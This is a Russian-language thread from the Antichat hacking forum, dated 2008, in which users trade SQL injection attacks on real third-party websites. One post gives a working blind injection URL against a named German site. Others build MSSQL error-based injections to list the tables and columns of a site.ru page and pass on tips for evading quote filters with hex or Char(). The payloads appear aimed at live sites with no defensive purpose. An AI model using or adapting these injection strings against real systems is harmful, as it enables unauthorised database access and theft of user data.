Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.07.2008, 18:38
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Да есть там скуля, работает на технологии more than 1 row
http://www.rauchfrei-info.de/index.php?id=9'+and+1=if(ord(substring((select%20t able_name%20from%20information_schema.tables%20lim it%200,1),1,1))=67,1,(select+table_name+from+infor mation_schema.tables))/*
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
16.07.2008, 19:26
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
2I-I00K
пожно по подробнее об этом ? гугль дал результаты на анлийском (\
ecли можно ссылку что бы почитать )
Последний раз редактировалось MaSTeR GэN; 16.07.2008 в 19:29..
|
|
|
|
16.07.2008, 19:41
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
MaSTeR GэN, ttp://www.xakep.ru/magazine/xa/111/056/1.asp
|
|
|
|
16.07.2008, 20:18
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
2n0ne thx  |
|
|
|
16.07.2008, 22:31
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
С этого момента любой оффтоп в этой теме будет наказыватся отрицательной репутацией. Тема называется ваши вопросы по уязвимостям, а не "нераскрученные скули" или "продайте сплойт". О чем стоит говорить в этой теме сказано в корневом сообщении, это последние китайское предупреждение
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
17.07.2008, 05:47
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928
Репутация:
137
|
|
в mssql узнал первую таблицу: content_meta_tbl, пытаюсь узнать другие:
Код:
http://www.site.ru/students/content.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('content_meta_tbl'))--
пишет
Incorrect syntax near 'content_meta_tbl'.
Поптыка узнать ячейки из этой таблица закончились также  |
|
|
|
17.07.2008, 06:48
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
zavra
content.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+(SELECT+TOP+2+TABLE_NAME+FROM+INFORMATION_SCHEMA .TABLES))--
перебирай второй TOP 1,2,3,4.....
|
|
|
|
17.07.2008, 22:27
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928
Репутация:
137
|
|
Код:
content.asp?id=1+or+1=(SELECT+TOP+2+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users')--
Incorrect syntax near 'users'.
что неправильного-то в синтаксисе?( |
|
|
|
17.07.2008, 22:47
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Ковычки фильтрует, в hex загони users
|
|
|
|
17.07.2008, 23:17
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
можно в Char()
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
